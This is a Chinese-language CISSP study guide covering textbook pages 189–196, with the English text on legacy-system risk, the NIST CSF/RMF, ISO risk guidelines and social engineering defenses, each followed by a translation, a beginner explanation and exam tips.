战略计划 战略计划是长期、稳定、方向性的安全计划。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 50 / PDF P189

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

To learn more about RMM, see “Developing a Generic Risk Maturity Model (GRMM) for Evaluating Risk Management in Construction Projects.” This is an interesting study of numerous RMM systems and the attempt to derive a generic RMM from the common elements. Legacy Risk An often-overlooked area of risk is that of legacy devices, which may be EOL and/or EOS/EOSL: End of life (EOL) is the point at which a manufacturer no longer produces a product. Service and support may continue for a period of time after EOL, but no new versions will be made available for sale or distribution.

An EOL product should be scheduled for replacement before it fails or reaches end of support (EOS) or end of service life (EOSL). EOL is sometimes perceived or used as the equivalent of EOSL. End of service-life (EOSL) or end of support (EOS) are those systems that are no longer receiving updates and support from the vendor. If an organization continues to use an EOSL system, then the risk of compromise is high because any future exploitation will never be patched or fixed. It is of utmost importance to move off EOSL systems in order to maintain a secure environment.

It might not seem initially costeffective or practical to move away from a solution that still works just because the vendor has terminated support. However, the security management efforts you will expend will likely far exceed the cost of developing and deploying a modern system–based replacement. For example, Windows 10 will reach its EOSL on October 14, 2025. Microsoft recommends moving on to Windows 11 by that deadline. Risk Frameworks A risk framework is a guideline or recipe for how risk is to be assessed, resolved, and monitored. NIST established the Risk Management Framework (RMF) and the Cybersecurity Framework (CSF). These are both U.S.

government guides for establishing and maintaining security, but the CSF is designed for critical infrastructure and commercial organizations, whereas the RMF establishes mandatory requirements for federal agencies. RMF was established in 2010, and the CSF was established in 2014.

中文直译 / 整理

要了解更多关于RMM的信息,请参阅“开发用于评估建筑项目风险管理的通 用风险成熟度模型(GRMM)”。 这是一项对多种RMM系统及其试图从共同 元素中推导出通用RMM的有趣研究。 遗留风险 一个常常被忽视的风险领域是遗留设备,这些设备可能已停产(EOL)和/或终止 支持(EOS/EOSL): 停产(EOL)是指制造商停止生产某一产品的时间点。 在EOL之后,服务 和支持可能仍会持续一段时间,但不会再有新版本可供销售或分发。 应在 EOL产品失效或达到终止支持(EOS)或终止服务寿命(EOSL)之前, 安排更换该产品。 EOL有时被误认为等同于EOSL。 终止服务寿命(EOSL)或终止支持(EOS)是指那些不再接收厂商更新和 支持的系统。 如果组织继续使用EOSL系统,则面临很高的被攻破风险,因 为任何未来的漏洞都将无法被修补或修复。 为了维持安全环境,移除 EOSL系统至关重要。 起初可能觉得,仅因厂商终止支持就更换一个仍能正 常工作的解决方案并不经济或不切实际。 然而,您在安全管理工作上投入 的精力,很可能远远超过开发和部署现代替代系统的成本。 例如, Windows 10将在2025年10月14日达到其EOSL。

微软建议在该截止日期 前迁移到Windows 11。 风险框架 一个 风险框架 是用于如何评估、解决和监控风险的指南或方法。 NIST 建立了 风险管理框架(RMF)和网络安全框架(CSF)。 这两个都是美国政府制定的 用于建立和维护安全性的指南,但 CSF 专为关键基础设施和商业组织设计,而 RMF 则为联邦机构建立了强制性要求。 RMF 于 2010 年建立,CSF 于 2014 年建立。

小白解释

场景先行:你是公司的安全负责人,正在读第 189 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
学习单元 51 / PDF P190

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Exam Outline objective 1.9.9 includes a list of risk frameworks. All of these risk frameworks are also listed in objective 1.3.4 as security control frameworks. It is common for a security control framework to be either directly used as a risk framework or have a subset of elements that are a risk framework.

The following concepts are covered in Chapter 1 as security control frameworks, but they are also relevant to the concepts here in Chapter 2 as risk frameworks: International Organization for Standardization (ISO) National Institute of Standards and Technology (NIST) Control Objectives for Information and Related Technologies (COBIT) Sherwood Applied Business Security Architecture (SABSA) Payment Card Industry (PCI) The Cybersecurity Framework (CSF) 2.0 (released in early 2024) is based on a framework core that consists of six functions: Identify. Understand and catalog assets, risks, and vulnerabilities. Protect. Implement safeguards to protect assets and data. Detect.

Develop and deploy mechanisms for identifying and detecting security incidents. Respond. Define strategies and processes for responding to and mitigating cybersecurity incidents. Recover. Develop and implement strategies for recovery and resilience after a cybersecurity incident. Govern. Establish, communicate, and oversee roles, responsibilities, and policies that ensure a proactive and adaptive approach to cybersecurity. The CSF is not a checklist or procedure—it is a prescription of operational activities that are to be performed on an ongoing basis for the support and improvement of security over time.

The CSF is more of an improvement system rather than its own specific risk management process or security

中文直译 / 整理

考试大纲目标 1.9.9 包含了一个风险框架列表。 所有这些风险框架也列 在目标 1.3.4 的安全控制框架中。 安全控制框架通常要么直接用作风险框架, 要么包含一部分构成风险框架的元素。 以下概念在 第 1 章 中作为安全控制 框架进行介绍,但它们在 第 2 章 中作为风险框架同样相关: 国际标准化组织(ISO) 美国国家标准与技术研究院(NIST) 信息及相关技术控制目标(COBIT) Sherwood应用业务安全架构(SABSA) 支付卡行业(PCI) 《网络安全框架(CSF) 2.0》(于2024年初发布)基于一个由六个功能组成的框架核心: 识别。 理解并编目资产、风险和漏洞。 保护。 实施保护资产和数据的防护措施。 检测。 开发并部署用于识别和检测安全事件的机制。 响应。 制定应对和缓解网络安全事件的策略与流程。 恢复。 制定并实施网络安全事件后的恢复与韧性策略。 治理。 建立、传达并监督确保网络安全主动与适应性方法的角色、职责和政 策。 CSF 不是检查清单或程序——它是为持续支持和提升安全性而需执行的一系 列操作活动的规范。 CSF 更像是一种改进系统,而非其自身的特定风险管 理流程或安全

小白解释

场景先行:你是公司的安全负责人,正在读第 190 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

安全控制框架:控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

COBIT:COBIT 偏 IT 治理和控制目标。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO、NIST、COBIT、SABSA、PCI DSS、FedRAMP 都常考。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

COBIT 常用于治理、控制、审计和业务价值。

题目强调业务需求驱动架构时留意 SABSA。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
安全控制框架 控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
COBIT COBIT 偏 IT 治理和控制目标。
SABSA SABSA 强调业务驱动、风险导向的安全架构。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 52 / PDF P191

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

infrastructure. The CSF provides a structured approach for organizations to assess, develop, and enhance their cybersecurity posture and resilience against cyberthreats. The Risk Management Framework (RMF), defined by NIST in SP 800-37 Rev. 2, is a structured and comprehensive framework used by the U.S. federal government and other organizations to manage and mitigate information security and cybersecurity risks associated with their information systems and networks. RMF establishes mandatory security requirements for U.S. federal agencies.

The RMF has seven phases (six of which are used cyclically) (see Figure 2.5): Prepare to execute the RMF from an organizationand system-level perspective by establishing a context and priorities for managing security and privacy risk. Categorize the system and the information processed, stored, and transmitted by the system based on an analysis of the impact of loss. Select an initial set of controls for the system and tailor the controls as needed to reduce risk to an acceptable level based on an assessment of risk. Implement the controls and describe how the controls are employed within the system and its environment of operation.

Assess the controls to determine if the controls are implemented correctly, operating as intended, and producing the desired outcomes with respect to satisfying the security and privacy requirements. Authorize the system or common controls based on a determination that the risk to organizational operations and assets, individuals, other organizations, and the Nation is acceptable. Monitor the system and the associated controls on an ongoing basis to include assessing control effectiveness, documenting changes to the system and environment of operation, conducting risk assessments and impact analyses, and reporting the security and privacy posture of the system. [From NIST SP 800-37 Rev. 2]

中文直译 / 整理

基础设施。 CSF 为组织提供了一种结构化的方法,以评估、制定和增强其网 络安全态势及应对网络威胁的韧性。 该风险管理框架(RMF)由NIST在SP 800‑37 Rev. 2中定义,是一个结构化且 全面的框架,美国联邦政府及其他组织使用该框架来管理和减轻其信息系统和 网络所面临的信息安全和网络安全风险。 RMF为美国联邦机构建立了强制性的 安全要求。 RMF包含七个阶段(其中六个阶段循环使用)(见图2.5): 准备从组织和系统层面建立安全与隐私风险的管理背景和优先级,以执行 RMF。 分类系统以及系统处理、存储和传输的信息,基于对损失影响的分析。 选择系统的初始控制措施,并根据风险评估结果调整控制措施,将风险 降低至可接受水平。 实施控制措施,并描述控制措施在系统及其运行环境中的应用方式。 评估控制措施,以确定控制措施是否正确实施、按预期运行,并在满 足安全与隐私要求方面产生预期效果。 授权系统或通用控制措施,基于对组织运营和资产、个人、其他组织以 及国家所面临风险可接受的判定。 监控系统及其相关控制措施,持续评估控制有效性、记录系统和运行环境 的变化、开展风险评估和影响分析,并报告系统的安全与隐私状况。

[来自 NIST SP 800‑37 Rev. 2]

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 53 / PDF P192

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 2.5 The elements of the risk management framework (RMF) (from NIST SP 800-37 Rev. 2, Figure 2) The later six phases are to be performed in order and repeatedly throughout the life of the organization. RMF is intended as a risk management process to identify and respond to threats. Use of the RMF will result in the establishment of a security infrastructure and a process for ongoing improvement of the secured environment. There is significantly more detail about RMF in the official NIST publication; we encourage you to review this publication in its entirety for a complete perspective on the RMF.

Another important risk framework or guide to risk management is the ISO/IEC 31000 document “Risk Management — Guidelines.” This is a highlevel overview of the idea of risk management that many will benefit from reading. This ISO guideline is intended to be useful to any type of organization, whether government or private sector. Another related guideline is ISO/IEC 27005, “Information Security, Cybersecurity and Privacy Protection: Guidance on Managing Information Security Risks.”

中文直译 / 整理

图 2.5 风险管理框架(RMF)的要素(来自 NIST SP 800‑37 Rev. 2,图 2) 后续六个阶段应按顺序在组织生命周期内重复执行。 RMF旨在作为识别和应对 威胁的风险管理流程。 使用RMF将建立安全基础设施以及持续改进安全环境的 过程。 官方 NIST 发布物中对 RMF 有更详细的说明; 我们鼓励您完整阅读该发布物, 以全面了解 RMF。 另一个重要的风险框架或风险管理指南是ISO/IEC 31000文件《风险管理——指 南》。 这是对风险管理理念的高层次概述,许多人阅读后都会受益。 该ISO指 南旨在对任何类型的组织都有用,无论是政府还是私营部门。 另一个相关的指 南是ISO/IEC 27005《信息安全、网络安全和隐私保护:信息安全管理指南》。

小白解释

场景先行:你是公司的安全负责人,正在读第 192 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
学习单元 54 / PDF P193

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A companion guide, ISO/IEC 31004 “Risk Management — Guidance for the Implementation of ISO 31000” (www.iso.org/standard/56610.html), might also be of interest. However, ISO 31004 has been withdrawn and had not been replaced as of Q1 2024. While the NIST RMF is a common focus of the CISSP, you might want to review other risk management frameworks for use in the real world.

Please consider the following for future research: The Committee of Sponsoring Organizations (COSO) of the Treadway Commission's Enterprise Risk Management — Integrated Framework ISACA's Risk IT Framework Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) Factor Analysis of Information Risk (FAIR) Threat Assessment and Remediation Analysis (TARA) Understanding that there are a number of well-recognized frameworks and that selecting one that fits your organization's requirements and style is important. Social Engineering Social engineering is a form of attack that exploits human nature and human behavior.

People are a weak link in security because they can make mistakes, be fooled into causing harm, or intentionally violate company security. Social engineering attacks exploit human characteristics such as a basic trust in others, a desire to provide assistance, or a propensity to show off. It is important to consider the risks that personnel represent to your organization and implement security strategies to minimize and handle those risks. Social engineering attacks take two primary forms: convincing someone to perform an unauthorized operation or convincing someone to reveal confidential information.

In just about every case, the social engineering attacker tries to convince the victim to perform some activity or reveal a piece A com p

中文直译 / 整理

阴离子 guide, ISO/IEC “风险管理—— 3 用于实施的指南 1004 p实施 ISO 1000” 3 (www.iso.org/standard/56610.html),也可能感兴趣。 然而, ISO 31004 已被撤回,截至 2024 年第一季度尚未被替代。 虽然NIST RMF是CISSP的常见重点,但您可能希望回顾其他在现实世界中 使用的风险管理框架。 请考虑以下内容用于未来研究: 特雷德韦委员会赞助组织委员会(COSO)的企业风险管理——整合框架 ISACA的Risk IT框架 操作关键威胁、资产与脆弱性评估(OCTAVE) 信息风险因素分析(FAIR) 威胁评估与补救分析(TARA) 理解有许多被广泛认可的框架,选择一个符合您组织需求和风格的框架至关 重要。 社会工程 社会工程 是一种利用人性和人类行为的攻击形式。 人员是安全中的薄弱环节, 因为他们可能犯错、被诱骗造成损害,或故意违反公司安全规定。 社会工程攻 击利用了人类的基本特征,例如对他人的基本信任、乐于助人的愿望,或爱炫 耀的倾向。 重要的是要考虑人员对您组织构成的风险,并实施安全策略以最小 化和应对这些风险。

社会工程攻击主要有两种形式:说服某人执行未经授权的操作,或说服某人泄 露机密信息。 在几乎所有情况下,社会工程攻击者都会试图让受害者执行某种 行为或泄露某些

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 55 / PDF P194

第 194 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

of information that they shouldn't. The result of a successful attack is information leakage or the attacker being granted logical or physical access to a secure environment. Here are some example scenarios of common social engineering attacks: A website claims to offer free temporary access to its products and services, but it requires web browser and/or firewall alterations in order to download the access software. These alterations may reduce the security protections or encourage the victim to install malicious browser helper objects (also known as plug-ins, extensions, or add-ons).

The help desk receives a call from someone claiming to be a department manager who is currently involved in a sales meeting in another city. The caller claims to have forgotten their password and needs it to be reset so that they can log in remotely to download an essential presentation. Someone who looks like a repair technician claims a service call was received for a malfunctioning device in the building. The “technician” is sure the unit can be accessed from inside your office work area and asks to be given access to repair the system.

If a worker receives a communication from someone asking to talk with a coworker by name, and there is no such person currently or previously working for the organization, this could be a ruse to either reveal the names of actual employees or convince you to “provide assistance” because the caller has incorrect information. When a contact on a discussion forum asks personal questions, such as your education, history, and interests, they could be focused on learning the answers to password reset questions. Some of these examples may also be legitimate and benign occurrences, but you can see how they could mask the motives and purposes of an attacker.

Social engineers attempt to mask and hide their true intentions by crafting their attacks to seem as normal and typical as possible. Whenever a security breach occurs, an investigation should be performed to determine what was affected and whether the attack is ongoing. Personnel should be retrained to detect and avoid similar social engineering attacks in the future. Although social engineering attacks primarily focus on people, the results of an attack can be a disclosure of private or confidential materials, physical damage to a facility, or remote access to an IT environment.

中文直译 / 整理

本不应泄露的信息。 成功攻击的结果是信息泄露,或攻击者获得对安全环境的 逻辑或物理访问权限。 以下是一些常见的社会工程学攻击示例场景: 一个网站声称提供其产品和服务的免费临时访问权限,但要求更改网页浏 览器和/或防火墙设置才能下载访问软件。 这些更改可能会降低安全防护级 别,或诱使受害者安装恶意的浏览器辅助对象(也称为插件、扩展程序或 附加组件)。 客服中心接到一通电话,来电者自称是某部门经理,目前正在另一个城市 参加销售会议。 该来电者称自己忘记了密码,需要重置密码以便远程登录 下载一份重要演示文稿。 一名看起来像维修技术人员的人声称收到了关于大楼内某设备故障的服务 请求。 这位“技术人员”确信该设备可以从您的办公区域内部访问,并要 求获得权限以修复系统。 如果员工收到某人联系并要求与某位同事通话,而该同事从未或目前并未 在该组织工作,这可能是一种骗局,旨在泄露实际员工的姓名,或利用来 电者信息错误诱导您“提供协助”。 当讨论论坛上的联系人询问个人问题,例如您的教育背景、经历和兴趣时, 他们可能旨在获取密码重置问题的答案。 这些示例中的一些也可能是合法且无害的情况,但您可以看出它们如何掩盖 攻击者的动机和目的。

社会工程学家会通过精心设计攻击,使其看起来尽可 能正常和典型,从而掩盖和隐藏其真实意图。 每当发生安全漏洞时,应进行调查以确定受影响的范围以及攻击是否仍在持续。 应对相关人员进行再培训,以便在未来识别并避免类似的社交工程攻击。 尽管 社交工程攻击主要针对人员,但攻击的结果可能导致私人或机密信息泄露、设 施物理损坏,或对IT环境的远程访问。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 194 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 56 / PDF P195

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Therefore, any attempted or successful social engineering breach should be thoroughly investigated and responded to.

Methods to protect against social engineering include the following: Training personnel about social engineering attacks and how to recognize common signs Requiring authentication when performing activities for personnel over the phone Defining restricted information that is never communicated over the phone or through plaintext communications such as standard email Always verifying the credentials of a repair person and verifying that a real service call was placed by authorized personnel Never following the instructions of an email without verifying the information with at least two independent and trusted sources Always erring on the side of caution when dealing with anyone you don't know or recognize, whether in person, over the phone, or over the Internet/network If several workers report the same odd event, such as a call or email, an investigation should look into what the contact was about, who initiated it, and what the intention or purpose was.

The most important defense against social engineering attacks is user education and awareness training. A healthy dose of paranoia and suspicion will help users detect or notice more social engineering attack attempts than without such preparation. Training should include role-playing and walking through numerous examples of the various forms of social engineering attacks. However, keep in mind that attackers are constantly altering their approaches and improving their means of attack. So, keeping current with newly discovered means of social engineering attacks is also necessary to defend against this human-focused threat.

Users should receive training when they first enter an organization, and they should receive periodic refresher training, even if it's just an email from the administrator or training officer reminding them of the threats. Social Engineering Principles

中文直译 / 整理

因此,任何尝试或成功的社交工程攻击都应得到彻底调查和响应。 防范社会工程学攻击的方法包括以下几点: 对人员进行社会工程学攻击培训,帮助其识别常见迹象 通过电话为人员执行操作时,要求进行身份验证 明确界定禁止通过电话或明文通信(如标准电子邮件)传输的受限信息 始终核实维修人员的身份,并确认服务请求确实由授权人员发起 绝不要在未经至少两个独立且可信的来源核实信息的情况下,遵循电 子邮件中的指令 在与任何你不认识或不熟悉的人打交道时,无论是在面对面、电话中还是 通过互联网/网络,都应始终秉持谨慎的态度。 如果多名员工报告了相同的异常事件,例如接到一通电话或收到一封邮件, 调查应查明该联系的内容、谁发起的联系,以及其意图或目的。 防范社会工程学攻击最重要的手段是用户教育和意识培训。 适度的偏执和怀疑 态度将帮助用户比没有接受此类培训时更有效地发现或察觉更多社会工程学攻 击尝试。 培训应包括角色扮演和深入分析各种社会工程学攻击形式的众多实例。 然而,请记住,攻击者不断改变其策略并改进其攻击手段。 因此,及时掌握新 发现的社会工程学攻击手段,对于防范这种以人为目标的威胁也是必要的。

用户在刚进入组织时应接受培训,并应定期接受更新培训,即使只是来自管理 员或培训官员的电子邮件,提醒他们注意各种威胁。 社会工程学原则

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 57 / PDF P196

第 196 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Social engineering works so well because we're human. The principles of social engineering attacks are designed to focus on various aspects of human nature and take advantage of them. Although not every target succumbs to every attack, most of us are vulnerable to one or more of the following common social engineering principles. Authority Authority is an effective technique because most people are likely to respond to authority with obedience. The trick is to convince the target that the attacker is someone with valid internal or external authority. Some attackers claim their authority verbally, and others assume authority by wearing a costume or uniform.

An example is an email sent using the spoofed email of the CEO in which workers are informed that they must visit a specific universal resource locator (URL)/universal resource indicator (URI) to fill out an important HR document. This method works when the victims blindly follow instructions that claim to be from a person of authority. Intimidation Intimidation can sometimes be seen as a derivative of the authority principle. Intimidation uses authority, confidence, or even the threat of harm to motivate someone to follow orders or instructions. Often, intimidation is focused on exploiting uncertainty in a situation where a clear directive of operation or response isn't defined.

